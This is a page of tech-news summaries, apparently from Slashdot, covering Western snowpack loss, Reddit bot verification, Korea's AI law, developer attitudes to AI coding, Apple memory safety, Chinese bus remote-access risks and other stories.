United States

Rapid Snow Melt-Off In American West Stuns Scientists (theguardian.com) 111

Scientists say extreme March heat caused an unusually rapid collapse of snowpack across the American West that's leaving major basins at record or near-record lows. "This year is on a whole other level," said Dr Russ Schumacher, a Colorado State University climatologist. "Seeing this year so far below any of the other years we have data for is very concerning." The Guardian reports: [...] The issue is extremely widespread. Data from a branch of the US Department of Agriculture (USDA), which logs averages based on levels between 1991 and 2020, shows states across the south-west and intermountain west with eye-popping lows. The Great Basin had only 16% of average on Monday and the lower Colorado region, which includes most of Arizona and parts of Nevada, was at 10%. The Rio Grande, which covers parts of New Mexico, Texas and Colorado, was at 8%. "This year has the potential of being way worse than any of the years we have analogues for in the past," Schumacher said.

Even with near-normal precipitation across most of the west, every major river basin across the region was grappling with snow drought when March began, according to federal analysts. Roughly 91% of stations reported below-median snow water equivalent, according to the last federal snow drought update compiled on March 8. Water managers and climate experts had been hopeful for a March miracle -- a strong cold storm that could set the region on the right track. Instead, a blistering heatwave unlike any recorded for this time of year baked the region and spurred a rapid melt-off. "March is often a big month for snowstorms," Schumacher said. "Instead of getting snow we would normally expect we got this unprecedented, way-off-the-scale warmth."

More than 1,500 monthly high temperature records were broken in March and hundreds more tied. The event was "likely among the most statistically anomalous extreme heat events ever observed in the American south-west," climate scientist Daniel Swain said in an analysis posted this week. "Beyond the conspicuous 'weirdness' of it all," Swain added, "the most consequential impact of our record-shattering March heat will likely be the decimation of the water year 2025-26 snowpack across nearly all of the American west." Calling the toll left by the heat "nothing short of shocking," Swain noted that California was tied for its worst mountain snowpack value on record. While the highest elevations are still coated in white, "lower slopes are now completely bare nearly statewide."

Privacy

Reddit Takes On Bots With 'Human Verification' Requirements (techcrunch.com) 75

Reddit is rolling out human-verification checks for accounts that show signs of bot-like behavior, while also labeling approved automated accounts that provide useful services. The social media company stressed that these checks will only happen if something appears "fishy," and that it is "not conducting sitewide human verification." TechCrunch reports: To identify potential bots, Reddit is using specialized tooling that looks at account-level signals and other factors -- like how quickly the account is attempting to write or post content. Using AI to write posts or comments, however, is not against its policies (though community moderators may set their own rules).

To verify an account is human, Reddit will leverage third-party tools like passkeys from Apple, Google, YubiKey, and other third-party biometric services, like Face ID or even Sam Altman's World ID -- or, in some countries, the use of government IDs. Reddit notes this last category may be required in some countries like the U.K. and Australia and some U.S. states, because of local regulations on age verification, but it's not the company's preferred method.
"If we need to verify an account is human, we'll do it in a privacy-first way," Reddit co-founder and CEO Steve Huffman wrote in the announcement Wednesday. "Our aim is to confirm there is a person behind the account, not who that person is. The goal is to increase transparency of what is what on Reddit while preserving the anonymity that makes Reddit unique. You shouldn't have to sacrifice one for the other."
Operating Systems

System76 Comments On Recent Age Verification Laws (phoronix.com) 87

In a blog post on Thursday, System76 CEO Carl Richell criticized new state laws in California, Colorado, and New York that would require operating systems to verify users' ages and expose that information to apps, arguing the rules are easy for kids to bypass and ultimately undermine privacy and freedom more than they protect minors.

"System76's position is interesting given that they sell Linux-loaded desktops, workstations and laptops plus being an operating system vendor with their in-house Pop!_OS distribution and COSMIC desktop environment," adds Phoronix's Michael Larabel, noting that they're also based out of Colorado. Here's an excerpt from the post: "A parent that creates a non-admin account on a computer, sets the age for a child account they create, and hands the computer over is in no different state. The child can install a virtual machine, create an account on the virtual machine and set the age to 18 or over. It's a similar technique to installing a VPN to get around the Great Firewall of China (just consider that for a moment). Or the child can simply re-install the OS and not tell their parents. ... In the case of Colorado's and California's bills, effectiveness is lost. In the case of New York's bill, liberty is lost. In the case of centralized platforms, potential is lost. ... The challenges we face are neither technical nor legal. The only solution is to educate our children about life with digital abundance. Throwing them into the deep end when they're 16 or 18 is too late. It's a wonderful and weird world. Yes, there are dark corners. There always will be. We have to teach our children what to do when they encounter them and we have to trust them." "We are accustomed to adding operating system features to comply with laws," writes Richell, in closing. "Accessibility features for ADA, and power efficiency settings for Energy Star regulations are two examples. We are a part of this world and we believe in the rule of law. We still hope these laws will be recognized for the folly they are and removed from the books or found unconstitutional."
United States

CIA Makes New Push To Recruit Chinese Military Officers as Informants (reuters.com) 72

An anonymous reader shares a report: Just weeks after a dramatic purge of China's top general, the CIA is moving to capitalize on any resulting discord with a new public video targeting potential informants in the Chinese military. The U.S. spy agency on Thursday rolled out the video depicting a disillusioned mid-level Chinese military officer, in the latest U.S. step in a campaign to ramp up human intelligence gathering on Washington's strategic rival.

It follows a similar effort last May that focused on fictional figures within China's ruling Communist Party that provided detailed Chinese-language instructions on how to securely contact U.S. intelligence. CIA Director John Ratcliffe said in a statement that the agency's videos had reached many Chinese citizens and that it would continue offering Chinese government officials an "opportunity to work toward a brighter future together."

AI

What Go Programmers Think of AI (go.dev) 55

"Most Go developers are now using AI-powered development tools when seeking information (e.g., learning how to use a module) or toiling (e.g., writing repetitive blocks of similar code)." That's one of the conclusions Google's Go team drew from September's big survey of 5,379 Go developers.

But the survey also found that among Go developers using AI-powered tools, "their satisfaction with these tools is middling due, in part, to quality concerns." Our survey suggests bifurcated adoption — while a majority of respondents (53%) said they use such tools daily, there is also a large group (29%) who do not use these at all, or only used them a few times during the past month. We expected this to negatively correlate with age or development experience, but were unable to find strong evidence supporting this theory except for very new developers: respondents with less than one year of professional development experience (not specific to Go) did report more AI use than every other cohort, but this group only represented 2% of survey respondents. At this time, agentic use of AI-powered tools appears nascent among Go developers, with only 17% of respondents saying this is their primary way of using such tools, though a larger group (40%) are occasionally trying agentic modes of operation...

We also asked about overall satisfaction with AI-powered development tools. A majority (55%) reported being satisfied, but this was heavily weighted towards the "Somewhat satisfied" category (42%) vs. the "Very satisfied" group (13%)... [D]eveloper sentiment towards them remains much softer than towards more established tooling (among Go developers, at least). What is driving this lower rate of satisfaction? In a word: quality. We asked respondents to tell us something good they've accomplished with these tools, as well as something that didn't work out well. A majority said that creating non-functional code was their primary problem with AI developer tools (53%), with 30% lamenting that even working code was of poor quality.

The most frequently cited benefits, conversely, were generating unit tests, writing boilerplate code, enhanced autocompletion, refactoring, and documentation generation. These appear to be cases where code quality is perceived as less critical, tipping the balance in favor of letting AI take the first pass at a task. That said, respondents also told us the AI-generated code in these successful cases still required careful review (and often, corrections), as it can be buggy, insecure, or lack context... [One developer said reviewing AI-generated code was so mentally taxing that it "kills the productivity potential".]

Of all the tasks we asked about, "Writing code" was the most bifurcated, with 66% of respondents already or hoping to soon use AI for this, while 1/4 of respondents didn't want AI involved at all. Open-ended responses suggest developers primarily use this for toilsome, repetitive code, and continue to have concerns about the quality of AI-generated code.

Most respondents also said they "are not currently building AI-powered features into the Go software they work on (78%)," the surveyors report, "with 2/3 reporting that their software does not use AI functionality at all (66%)." This appears to be a decrease in production-related AI usage year-over-year; in 2024, 59% of respondents were not involved in AI feature work, while 39% indicated some level of involvement. That marks a shift of 14 points away from building AI-powered systems among survey respondents, and may reflect some natural pullback from the early hype around AI-powered applications: it's plausible that lots of folks tried to see what they could do with this technology during its initial rollout, with some proportion deciding against further exploration (at least at this time).

Among respondents who are building AI- or LLM-powered functionality, the most common use case was to create summaries of existing content (45%). Overall, however, there was little difference between most uses, with between 28% — 33% of respondents adding AI functionality to support classification, generation, solution identification, chatbots, and software development.

AI

South Korea Launches Landmark Laws To Regulate AI 7

An anonymous reader quotes a report from the Korea Herald: South Korea will begin enforcing its Artificial Intelligence Act on Thursday, becoming the first country to formally establish safety requirements for high-performance, or so-called frontier, AI systems -- a move that sets the country apart in the global regulatory landscape. According to the Ministry of Science and ICT, the new law is designed primarily to foster growth in the domestic AI sector, while also introducing baseline safeguards to address potential risks posed by increasingly powerful AI technologies. Officials described the inclusion of legal safety obligations for frontier AI as a world-first legislative step.

The act lays the groundwork for a national-level AI policy framework. It establishes a central decision-making body -- the Presidential Council on National Artificial Intelligence Strategy -- and creates a legal foundation for an AI Safety Institute that will oversee safety and trust-related assessments. The law also outlines wide-ranging support measures, including research and development, data infrastructure, talent training, startup assistance, and help with overseas expansion.

To reduce the initial burden on businesses, the government plans to implement a grace period of at least one year. During this time, it will not carry out fact-finding investigations or impose administrative sanctions. Instead, the focus will be on consultations and education. A dedicated AI Act support desk will help companies determine whether their systems fall within the law's scope and how to respond accordingly. Officials noted that the grace period may be extended depending on how international standards and market conditions evolve. The law applies to three areas only: high-impact AI, safety obligations for high-performance AI and transparency requirements for generative AI.

Enforcement under the Korean law is intentionally light. It does not impose criminal penalties. Instead, it prioritizes corrective orders for noncompliance, with fines -- capped at 30 million won ($20,300) -- issued only if those orders are ignored. This, the government says, reflects a compliance-oriented approach rather than a punitive one. Transparency obligations for generative AI largely align with those in the EU, but Korea applies them more narrowly. Content that could be mistaken for real, such as deepfake images, video or audio, must clearly disclose its AI-generated origin. For other types of AI-generated content, invisible labeling via metadata is allowed. Personal or noncommercial use of generative AI is excluded from regulation.
"This is not about boasting that we are the first in the world," said Kim Kyeong-man, deputy minister of the office of artificial intelligence policy at the ICT ministry. "We're approaching this from the most basic level of global consensus."

Korea's approach differs from the EU by defining "high-performance AI" using technical thresholds like cumulative training compute, rather than regulating based on how AI is used. As a result, Korea believes no current models meet the bar for regulation, while the EU is phasing in broader, use-based AI rules over several years.
Programming

'Just Because Linus Torvalds Vibe Codes Doesn't Mean It's a Good Idea' (theregister.com) 61

In an opinion piece for The Register, Steven J. Vaughan-Nichols argues that while "vibe coding" can be fun and occasionally useful for small, throwaway projects, it produces brittle, low-quality code that doesn't scale and ultimately burdens real developers with cleanup and maintenance. An anonymous reader shares an excerpt: Vibe coding got a big boost when everyone's favorite open source programmer, Linux's Linus Torvalds, said he'd been using Google's Antigravity LLM on his toy program AudioNoise, which he uses to create "random digital audio effects" using his "random guitar pedal board design." This is not exactly Linux or even Git, his other famous project, in terms of the level of work. Still, many people reacted to Torvalds' vibe coding as "wow!" It's certainly noteworthy, but has the case for vibe coding really changed?

[...] It's fun, and for small projects, it's productive. However, today's programs are complex and call upon numerous frameworks and resources. Even if your vibe code works, how do you maintain it? Do you know what's going on inside the code? Chances are you don't. Besides, the LLM you used two weeks ago has been replaced with a new version. The exact same prompts that worked then yield different results today. Come to think of it, it's an LLM. The same prompts and the same LLM will give you different results every time you run it. This is asking for disaster.

Just ask Jason Lemkin. He was the guy who used the vibe coding platform Replit, which went "rogue during a code freeze, shut down, and deleted our entire database." Whoops! Yes, Replit and other dedicated vibe programming AIs, such as Cursor and Windsurf, are improving. I'm not at all sure, though, that they've been able to help with those fundamental problems of being fragile and still cannot scale successfully to the demands of production software. It's much worse than that. Just because a program runs doesn't mean it's good. As Ruth Suehle, President of the Apache Software Foundation, commented recently on LinkedIn, naive vibe coders "only know whether the output works or doesn't and don't have the skills to evaluate it past that. The potential results are horrifying."

Why? In another LinkedIn post, Craig McLuckie, co-founder and CEO of Stacklok, wrote: "Today, when we file something as 'good first issue' and in less than 24 hours get absolutely inundated with low-quality vibe-coded slop that takes time away from doing real work. This pattern of 'turning slop into quality code' through the review process hurts productivity and hurts morale." McLuckie continued: "Code volume is going up, but tensions rise as engineers do the fun work with AI, then push responsibilities onto their team to turn slop into production code through structured review."

Space

SpaceX Launches New NASA Telescope to Help JWST Study Exoplanets (livescience.com) 13

Last week a University of Arizona astronomy professor "watched anxiously...as an awe-inspiring SpaceX Falcon 9 rocket carried NASA's new exoplanet telescope, Pandora, into orbit."

In 2018 NASA had approached Daniel Apai to help build the telescope, which he says will "shatter a barrier — to understand and remove a source of noise in the data — that limits our ability to study small exoplanets in detail and search for life on them." Astronomers have a trick to study exoplanet atmospheres. By observing the planets as they orbit in front of their host stars, we can study starlight that filters through their atmospheres... But, starting from 2007, astronomers noted that starspots — cooler, active regions on the stars — may disturb the transit measurements. In 2018 and 2019, then-Ph.D. student Benjamin V. Rackham, astrophysicist Mark Giampapa and I published a series of studies showing how darker starspots and brighter, magnetically active stellar regions can seriously mislead exoplanets measurements. We dubbed this problem "the transit light source effect...."

In our papers — published three years before the 2021 launch of the James Webb Space Telescope - we predicted that the Webb cannot reach its full potential. We sounded the alarm bell... Pandora will do what Webb cannot: It will be able to patiently observe stars to understand how their complex atmospheres change.

By staring at a star for 24 hours with visible and infrared cameras, it will measure subtle changes in the star's brightness and colors. When active regions in the star rotate in and out of view, and starspots form, evolve and dissipate, Pandora will record them. While Webb very rarely returns to the same planet in the same instrument configuration and almost never monitors their host stars, Pandora will revisit its target stars 10 times over a year, spending over 200 hours on each of them.

It's the first space telescope "built specifically for detailed multi-color observations of starlight filtered through the atmospheres of exoplanets," reports the Arizona Daily Star, noting the University of Arizona will serve as mission control: [T]echnicians will operate Pandora in real time and monitor its telemetry and overall health under a contract with NASA... The spacecraft will undergo about a month of commissioning before beginning science operations, which are scheduled to last for a year...

Pandora was selected as part of NASA's Astrophysics Pioneers program, which was created in 2020 to foster compelling, relatively low-cost science missions using smaller, cheaper hardware and flight platforms with a price cap of no more than $20 million. By comparison, the Webb telescope — the largest and most powerful astronomical observatory ever sent into space — carries a pricetag of about $10 billion.

Pandora is a joint mission NASA and California's Lawrence Livermore National Laboratory.
AI

Rivian Goes Big On Autonomy, With Custom Silicon, Lidar, and a Hint At Robotaxis (techcrunch.com) 29

During the company's first "Autonomy & AI Day" event today, Rivian unveiled a major autonomy push featuring custom silicon, lidar, and a "large driving model." It also hinted at a potential entry into the self-driving ride-hail market, according to CEO RJ Scaringe. TechCrunch reports: Rivian said it will expand the hands-free version of its driver-assistance software to "over 3.5 million miles of roads across the USA and Canada" and will eventually expand beyond highways to surface streets (with clearly painted road lines). This expanded access will be available on the company's second-generation R1 trucks and SUVs. It's calling the expanded capabilities "Universal Hands-Free" and will launch in early 2026. Rivian says it will charge a one-time fee of $2,500 or $49.99 per month.

"What that means is you can get into the vehicle at your house, plug in the address to where you're going, and the vehicle will completely drive you there," Scaringe said Thursday, describing a point-to-point navigation feature. After that, Rivian plans to allow drivers to take their eyes off the road. "This gives you your time back. You can be on your phone, or reading a book, no longer needing to be actively involved in the operation of vehicle." Rivian's driver assistance software won't stop there; the EV maker laid out plans on Thursday to enhance its capabilities all the way up to what it's calling "personal L4," a nod to the level set by the Society of Automotive Engineers that means a car can operate in a particular area with no human intervention.

After that, Scaringe hinted that Rivian will be looking at competing with the likes of Waymo. "While our initial focus will be on personally owned vehicles, which today represent a vast majority of the miles driven in the United States, this also enables us to pursue opportunities in the ride-share space," he said. To help accomplish these lofty goals, Rivian has been building a "large driving model" (think: an LLM but for real-world driving), part of a move away from a rules-based framework for developing autonomous vehicles that has been led by Tesla. The company also showed off its own custom 5nm processor, which it says will be built in collaboration with both Arm and TSMC.

AI

AI Can Already Do the Work of 12% of America's Workforce, Researchers Find (msn.com) 59

An anonymous reader shared this report from CBS News: Artificial intelligence can do the work currently performed by nearly 12% of America's workforce, according to a recentstudy from the Massachusetts Institute of Technology. The researchers, relying on a metric called the "Iceberg Index" that measures a job's potential to be automated, conclude that AI already has the cognitive and technical capacity to handle a range of tasks in technology, finance, health care and professional services. The index simulated how more than 150 million U.S. workers across nearly 1,000 occupations interact and overlap with AI's abilities...

AI is also already doingsome of the entry-level jobsthat have historically been reserved for recent college graduates or relatively inexperienced workers, the report notes. "AI systems now generate more than a billion lines of code each day, prompting companies to restructure hiring pipelines and reduce demand for entry-level programmers," the researchers wrote. "These observable changes in technology occupations signal a broader reorganization of work that extends beyond software development."

"The study doesn't seek to shed light on how many workers AI may already have displaced or could supplant in the future," the article points out.

"To what extent such tools take over job functions performed by people depends on a number of factors, including individual businesses' strategy, societal acceptance and possible policy interventions, the researchers note."
Security

Someone Is Trying To 'Hack' People Through Apple Podcasts (404media.co) 9

Apple's Podcasts app on both iOS and Mac has been exhibiting strange behavior for months, spontaneously launching and presenting users with obscure religion, spirituality and education podcasts they never subscribed to -- and at least one of these podcasts contains a link attempting a cross-site scripting attack, 404 Media reports. Joseph Cox, a journalist at the outlet, documented the issue after repeatedly finding his Mac had launched the Podcasts app on its own, presenting bizarre podcasts with titles containing garbled code, external URLs to Spotify and Google Play, and in one case, what appears to be XSS attack code embedded directly in the podcast title itself.

Patrick Wardle, a macOS security expert and creator of Objective-See, confirmed he could replicate similar behavior: simply visiting a website can trigger the Podcasts app to open and load an attacker-chosen podcast without any user prompt or approval. Wardle said this creates "a very effective delivery mechanism" if a vulnerability exists in the Podcasts app, and the level of probing suggests adversaries are actively evaluating it as a potential target. The XSS-attempting podcast dates from around 2019. A recent review in the app asked "How does Apple allow this attempted XSS attack?"

Asked for comment five times by 404 Media, Apple did not respond.
Earth

'The Strange and Totally Real Plan to Blot Out the Sun and Reverse Global Warming' (politico.com) 117

In a 2023 pitch to investors, a "well-financed, highly credentialed" startup named Stardust aimed for a "gradual temperature reduction demonstration" in 2027, according to a massive new 9,600-word article from Politico. ("Annually dispersing ~1 million tons of sun-reflecting particles," says one slide. "Equivalent to ~1% extra cloud coverage.")

"Another page told potential investors Stardust had already run low-altitude experiments using 'test particles'," the article notes: [P]ublic records and interviews with more than three dozen scientists, investors, legal experts and others familiar with the company reveal an organization advancing rapidly to the brink of being able to press "go" on its planet-cooling plans. Meanwhile, Stardust is seeking U.S. government contracts and quietly building an influence machine in Washington to lobby lawmakers and officials in the Trump administration on the need for a regulatory framework that it says is necessary to gain public approval for full-scale deployment....

The presentation also included revenue projections and a series of opportunities for venture capitalists to recoup their investments. Stardust planned to sign "government contracts," said a slide with the company's logo next to an American flag, and consider a "potential acquisition" by 2028. By 2030, the deck foresaw a "large-scale demonstration" of Stardust's system. At that point, the company claimed it would already be bringing in $200 million per year from its government contracts and eyeing an initial public offering, if it hadn't been sold already.

The article notes that for "a widening circle of researchers and government officials, Stardust's perceived failures to be transparent about its work and technology have triggered a larger conversation about what kind of international governance framework will be needed to regulate a new generation of climate technologies." (Since currently Stardust and its backers "have no legal obligations to adhere to strenuous safety principles or to submit themselves to the public view.")

In October Politico spoke to Stardust CEO, Yanai Yedvab, a former nuclear physicist who was once deputy chief scientist at the Israeli Atomic Energy Commission. Stardust "was ready to announce the $60 million it had raised from 13 new investors," the article points out, "far larger than any previous investment in solar geoengineering." [Yedvab] was delighted, he said, not by the money, but what it meant for the project. "We are, like, few years away from having the technology ready to a level that decisions can be taken" — meaning that deployment was still on track to potentially begin on the timeline laid out in the 2023 pitch deck. The money raised was enough to start "outdoor contained experiments" as soon as April, Yedvab said. These would test how their particles performed inside a plane flying at stratospheric heights, some 11 miles above the Earth's surface... The key thing, he insisted, was the particle was "safe." It would not damage the ozone layer and, when the particles fall back to Earth, they could be absorbed back into the biosphere, he said. Though it's impossible to know this is true until the company releases its formula. Yedvab said this round of testing would make Stardust's technology ready to begin a staged process of full-scale, global deployment before the decade is over — as long as the company can secure a government client. To start, they would only try to stabilize global temperatures — in other words fly enough particles into the sky to counteract the steady rise in greenhouse gas levels — which would initially take a fleet of 100 planes.
This begs the question: should the world attempt solar geoengineering? That the global temperature would drop is not in question. Britain's Royal Society... said in a report issued in early November that there was little doubt it would be effective. They did not endorse its use, but said that, given the growing interest in this field, there was good reason to be better informed about the side effects... [T]hat doesn't mean it can't have broad benefits when weighed against deleterious climate change, according to Ben Kravitz, a professor of earth and atmospheric sciences at Indiana University who has closely studied the potential effects of solar geoengineering. "There would be some winners and some losers. But in general, some amount of ... stratospheric aerosol injection would likely benefit a whole lot of people, probably most people," he said. Other scientists are far more cautious. The Royal Society report listed a range of potential negative side effects that climate models had displayed, including drought in sub-Saharan Africa. In accompanying documents, it also warned of more intense hurricanes in the North Atlantic and winter droughts in the Mediterranean. But the picture remains partial, meaning there is no way yet to have an informed debate over how useful or not solar geoengineering could be...

And then there's the problem of trying to stop. Because an abrupt end to geoengineering, with all the carbon still in the atmosphere, would cause the temperature to soar suddenly upward with unknown, but likely disastrous, effects... Once the technology is deployed, the entire world would be dependent on it for however long it takes to reduce the trillion or more tons of excess carbon dioxide in the atmosphere to a safe level...

Stardust claims to have solved many technical and safety challenges, especially related to the environmental impacts of the particle, which they say would not harm nature or people. But researchers say the company's current lack of transparency makes it impossible to trust.

Thanks to long-time Slashdot reader fjo3 for sharing the article.
United Kingdom

UK Unveils Plan To Cut Animal Testing Through Greater Use of AI (theguardian.com) 5

Animal testing in science would be phased out faster under a new plan to increase the use of artificial intelligence and 3D bioprinted human tissues, a UK minister has said. The Guardian: The roadmap unveiled by the science minister, Patrick Vallance, backs replacing certain animal tests that are still used where necessary to determine the safety of products such as life-saving vaccines and the impact pesticides have on living beings and the environment. The strategy says phasing out the use of animals in science can only happen when reliable and effective alternative methods with the same level of safety for human exposure can replace them.

The government said new funding for researchers and streamlined regulation would help develop methods such as organ-on-a-chip systems -- tiny devices that mimic how human organs work using real human cells. Greater use of AI to analyse vast amounts of data about molecules and predict whether new medicines will be safe and work well on humans would be deployed, while 3D bioprinted tissues could create realistic human tissue samples, from skin to liver, for testing.

Other plans under the strategy include an end to regulatory testing on animals to assess the potential for skin and eye irritation and skin sensitisation by the end of 2026. By 2027, researchers are expected under the strategy to end tests of the strength of botox on mice, while by 2030 pharmacokinetic studies -- which track how a drug moves through the body over time -- on dogs and non-human primates will be reduced.

Security

Danish Authorities In Rush To Close Security Loophole In Chinese Electric Buses (theguardian.com) 43

An anonymous reader quotes a report from the Guardian: Authorities in Denmark are urgently studying how to close an apparent security loophole in hundreds of Chinese-made electric buses that enables them to be remotely deactivated. The investigation comes after transport authorities in Norway, where the Yutong buses are also in service, found that the Chinese supplier had remote access for software updates and diagnostics to the vehicles' control systems -- which could be exploited to affect buses while in transit.

Amid concerns over potential security risks, the Norwegian public transport authority Ruter decided to test two electric buses in an isolated environment. Bernt Reitan Jenssen, Ruter's chief executive, said: "The testing revealed risks that we are now taking measures against. National and local authorities have been informed and must assist with additional measures at a national level." Their investigations found that remote deactivation could be prevented by removing the buses' sim cards, but they decided against this because it would also disconnect the bus from other systems.

Ruter said it planned to bring in stricter security requirements for future procurements. Jenssen said it must act before the arrival of the next generation of buses, which could be even "more integrated and harder to secure." Movia, Denmark's largest public transport company, has 469 Chinese electric buses in operation -- 262 of which were manufactured by Yutong.
Jeppe Gaard, Movia's chief operating officer, said he was made aware of the loophole last week. "This is not a Chinese bus problem," he said. "It is a problem for all types of vehicles and devices with Chinese electronics built in."
Earth

Are Supershear Earthquakes Even More Dangerous Than We Thought? (yahoo.com) 4

Long-time Slashdot reader Bruce66423 shared this article from the Los Angeles Times: Scientists have increasingly observed how the rupturing of a fault during an earthquake can be even faster than the speed of another type of damaging seismic wave, theoretically generating energy on the level of a sonic boom. These shock waves — created during "supershear" earthquakes — can worsen how bad the ground shakes both side to side and up and down along an affected fault area, scientists at USC, Caltech and the University of Illinois Urbana-Champaign wrote in a recent opinion article for the journal Seismological Research Letters. Although not everyone agrees that supershear earthquakes are inherently more destructive than other types, the potential implications are massive and need to be accounted for in seismic forecasts, the scientists contend... In just the last 15 years, 14 of 39 large strike-slip earthquakes have exhibited features of supershear ruptures, the opinion article said....

In California, supershear earthquakes would be expected on the straightest of "strike-slip" faults — in which one block of earth slides past another — like the San Andreas... There are a number of communities directly on top of the San Andreas fault. Among them are Coachella, Indio, Cathedral City, Palm Springs, Desert Hot Springs, Banning, Yucaipa, Highland, San Bernardino, Wrightwood, Palmdale, Gorman, Frazier Park, San Juan Bautista, Palo Alto, Portola Valley, Woodside, San Bruno, South San Francisco, Pacifica, Daly City and Bodega Bay.

One earthquake scientist suggests building codes need to be more strict, according to the article.

But it also cites a U.S. Geological Survey research geophysicist who isn't convinced by the new opinion article. "I don't think we know yet whether supershear ruptures really are more destructive."
Education

The School That Replaces Teachers With AI (joincolossus.com) 124

Long-time Slashdot reader theodp writes: CBS News has a TL;DR video report, but Jeremy Stern's earlier epic Class Dismissed [at Collosus.com] offers a deep dive into Alpha School, "the teacherless, homeworkless, K-12 private school in Austin, Texas, where students have been testing in the top 0.1% nationally by self-directing coursework with AI tutoring apps for two hours a day.

Alpha students are incentivized to complete coursework to "mastery-level" (i.e., scoring over 90%) in only two hours via a mix of various material and immaterial rewards, including the right to spend the other four hours of the school day in 'workshops,' learning things like how to run an Airbnb or food truck, manage a brokerage account or Broadway production, or build a business or drone."

Founder MacKenzie Larson's dream that "kids must love school so much they don't want to go on vacation" drew the attention of — and investments of money and time from — mysterious tech billionaire Joe Liemandt, who sent his own kids to Larson's school and now aims to bring the experience to rest of the world. "When GenAI hit in 2022," Liemandt said, "I took a billion dollars out of my software company. I said, 'Okay, we're going to be able to take MacKenzie's 2x in 2 hours groundwork and get it out to a billion kids.' It's going to cost more than that, but I could start to figure it out. It's going to happen. There's going to be a tablet that costs less than $1,000 that is going to teach every kid on this planet everything they need to know in two hours a day and they're going to love it.

"I really do think we can transform education for everybody in the world. So that's my next 20 years. I literally wake up now and I'm like, I'm the luckiest guy in the world. I will work 7 by 24 for the next 20 years to fricking do this. The greatest 20 years of my life are right ahead of me. I don't think I'm going to lose. We're going to win."

Of course, Stern writes at Collosus.com, there will be questions about this model of schooling, but asks: "Suppose that from kindergarten through 12th grade, your child's teachers were, in essence, stacks of machines. Suppose those machines unlocked more of your child's academic potential than you knew was possible, and made them love school. Suppose the schooling they loved involved vision monitoring and personal data capture. Suppose that surveillance architecture enabled them to outperform your wildest expectations on standardized tests, and in turn gave them self-confidence and self-esteem, and made their own innate potential seem limitless.... Suppose poor kids had a reason to believe and a way to show they're just as academically capable as rich kids, and that every student on Earth could test in what we now consider the top 10%. Suppose it allowed them to spend two-thirds of their school day on their own interests and passions. Suppose your child's deep love of school minted a new class of education billionaires.

"If you shrink from such a future, by which principle would you justify stifling it?"

Cellphones

Thwarted Plot To Cripple Cell Service In NY Was Bigger Than First Thought (go.com) 47

Last month, federal investigators said they dismantled a China-linked plot that aimed to cripple New York City's telecommunications system by overloading cell towers, jamming 911 calls, and disrupting communications. According to law enforcement sources, the plot was even bigger than first thought. "Agents from Homeland Security Investigations found an additional 200,000 SIM cards at a location in New Jersey," according to ABC News. "That's double the 100,000 SIM cards, along with hundreds of servers, that were recently seized at five other vacant offices and apartments in and around the city." From the report: Investigators secured each of those locations, seized the electronics, and are now trying to track down who rented the spaces and filled them with shelves full of gear capable of sending 30 million anonymous text messages every minute, overloading communications and blacking out cellular service in a city that relies on it for emergency response and counterterrorism.

According to sources, the investigation began after several high-level people, including at least one with direct access to President Donald Trump, were targeted not only by swatters but also with actual threats received on their private phones.
"The potential threat these data centers pose to the public could include shutting down critical resources that the public needs, like the 911 system, or potentially impacting the public's ability to communicate everything, including business transactions," said Don Mihalek, an ABC News contributor who was formerly with the Secret Service.
Security

Apple Claims 'Most Significant Upgrade to Memory Safety' in OS History (apple.com) 39

"There has never been a successful, widespread malware attack against iPhone," notes Apple's security blog, pointing out that "The only system-level iOS attacks we observe in the wild come from mercenary spyware... historically associated with state actors and [using] exploit chains that cost millions of dollars..."

But they're doing something about it — this week announcing a new always-on memory-safety protection in the iPhone 17 lineup and iPhone Air (including the kernel and over 70 userland processes)... Known mercenary spyware chains used against iOS share a common denominator with those targeting Windows and Android: they exploit memory safety vulnerabilities, which are interchangeable, powerful, and exist throughout the industry... For Apple, improving memory safety is a broad effort that includes developing with safe languages and deploying mitigations at scale...

Our analysis found that, when employed as a real-time defensive measure, the original Arm Memory Tagging Extension (MTE) release exhibited weaknesses that were unacceptable to us, and we worked with Arm to address these shortcomings in the new Enhanced Memory Tagging Extension (EMTE) specification, released in 2022. More importantly, our analysis showed that while EMTE had great potential as specified, a rigorous implementation with deep hardware and operating system support could be a breakthrough that produces an extraordinary new security mechanism.... Ultimately, we determined that to deliver truly best-in-class memory safety, we would carry out a massive engineering effort spanning all of Apple — including updates to Apple silicon, our operating systems, and our software frameworks. This effort, together with our highly successful secure memory allocator work, would transform MTE from a helpful debugging tool into a groundbreaking new security feature.

Today we're introducing the culmination of this effort: Memory Integrity Enforcement (MIE), our comprehensive memory safety defense for Apple platforms. Memory Integrity Enforcement is built on the robust foundation provided by our secure memory allocators, coupled with Enhanced Memory Tagging Extension (EMTE) in synchronous mode, and supported by extensive Tag Confidentiality Enforcement policies. MIE is built right into Apple hardware and software in all models of iPhone 17 and iPhone Air and offers unparalleled, always-on memory safety protection for our key attack surfaces including the kernel, while maintaining the power and performance that users expect. In addition, we're making EMTE available to all Apple developers in Xcode as part of the new Enhanced Security feature that we released earlier this year during WWDC...

Based on our evaluations pitting Memory Integrity Enforcement against exceptionally sophisticated mercenary spyware attacks from the last three years, we believe MIE will make exploit chains significantly more expensive and difficult to develop and maintain, disrupt many of the most effective exploitation techniques from the last 25 years, and completely redefine the landscape of memory safety for Apple products. Because of how dramatically it reduces an attacker's ability to exploit memory corruption vulnerabilities on our devices, we believe Memory Integrity Enforcement represents the most significant upgrade to memory safety in the history of consumer operating systems.

Games

Battlefield 6 Dev Apologizes For Requiring Secure Boot To Power Anti-Cheat Tools (arstechnica.com) 60

An anonymous reader quotes a report from Ars Technica: Earlier this month, EA announced that players in its Battlefield 6 open beta on PC would have to enable Secure Boot in their Windows OS and BIOS settings. That decision proved controversial among players who weren't able to get the finicky low-level security setting working on their machines and others who were unwilling to allow EA's anti-cheat tools to once again have kernel-level access to their systems. Now, Battlefield 6 technical director Christian Buhl is defending that requirement as something of a necessary evil to combat cheaters, even as he apologizes to any potential players that it has kept away.

"The fact is I wish we didn't have to do things like Secure Boot," Buhl said in an interview with Eurogamer. "It does prevent some players from playing the game. Some people's PCs can't handle it and they can't play: that really sucks. I wish everyone could play the game with low friction and not have to do these sorts of things." Throughout the interview, Buhl admits that even requiring Secure Boot won't completely eradicate cheating in Battlefield 6 long term. Even so, he offered that the Javelin anti-cheat tools enabled by Secure Boot's low-level system access were "some of the strongest tools in our toolbox to stop cheating. Again, nothing makes cheating impossible, but enabling Secure Boot and having kernel-level access makes it so much harder to cheat and so much easier for us to find and stop cheating." [...]

